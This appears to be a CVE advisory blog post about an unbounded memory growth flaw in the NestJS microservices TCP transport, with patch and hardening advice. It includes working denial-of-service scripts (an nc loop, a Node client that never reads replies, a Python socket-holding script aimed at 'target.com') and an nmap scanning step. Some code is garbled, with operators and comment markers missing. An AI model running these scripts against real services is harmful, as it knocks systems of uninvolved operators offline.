Listen to this Post
A peer that can open a TCP connection to a NestJS microservice using the built-in TCP transport can make the server process allocate memory without limit, on either side of the connection, until the process is killed by the OS or by its container memory limit. No authentication, no credentials, and no valid message are required. Applications are affected only if they start a microservice with Transport.TCP and the transport’s port is reachable by an untrusted peer. The TCP transport frames messages as
DailyCVE Form:
Platform: NestJS Microservices
Version: 12.0.0-12.0.2, <11.2.5
Vulnerability : Unbounded Memory Growth
Severity: Medium
date: 2026-09-30
Prediction: Patched 2026-09-30
What Undercode Say:
Start a vulnerable NestJS microservice with TCP transport nest new microservice-demo cd microservice-demo npm install @nestjs/microservices In main.ts, use Transport.TCP
// Vulnerable code: no timeout, no connection cap
const app = await NestFactory.createMicroservice(AppModule, {
transport: Transport.TCP,
options: { host: '0.0.0.0', port: 3000 },
});
await app.listen();
Exploit partial packet memory exhaustion
Open 10 connections, each send 20MB then go silent
for i in {1..10}; do
(echo -n "20971520" && head -c 20971520 /dev/zero) | nc localhost 3000 &
done
Monitor memory
while true; do ps -o rss= -p $(pgrep -f "nest start"); sleep 1; done
Exploit response backpressure
Client issues 30 requests but never reads responses
node -e "
const net = require('net');
const c = net.connect(3000, () => {
for (let i = 0; i < 30; i++) {
c.write('100{\"pattern\":\"getLargePayload\"}');
}
c.pause(); // never read responses
});
"
// Patched configuration (v12.0.3 / v11.2.5)
const app = await NestFactory.createMicroservice(AppModule, {
transport: Transport.TCP,
options: {
host: '0.0.0.0',
port: 3000,
incompleteMessageTimeout: 30000,
maxSendBufferSize: 128 1024 1024,
},
});
Exploit: (Educational Purposes!)
1. Identify exposed TCP transport port
nmap -p 3000 --script=banner target.com
2. Memory exhaustion via stalled partial packets
python3 -c "
import socket, time
sockets = []
for _ in range(20):
s = socket.socket()
s.connect(('target.com', 3000))
s.send(b'10485760') declare 10MB length
s.send(b'A' 1024) send 1KB then stop
sockets.append(s)
time.sleep(3600) hold connections open
"
3. Response queue exhaustion
Handler must return large payloads; client sends requests without reading
Protection: from this CVE
Upgrade @nestjs/microservices to 12.0.3 or 11.2.5. Configure incompleteMessageTimeout and maxSendBufferSize. Restrict network access to the TCP transport port using firewall rules, security groups, or network policies. Use a custom socketClass with idle timeout and backpressure handling if upgrade is not possible. Lower maxBufferSize to reduce per-connection receive buffer. Do not rely on process memory limits as mitigation.
Impact:
An unauthenticated peer that can reach the transport’s port can drive the process to an out-of-memory kill. Under a container memory limit this is fast and repeatable, and it restarts the pod rather than merely degrading it. There is no confidentiality or integrity impact. Nothing is read, written, or executed; the failure mode is availability only.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

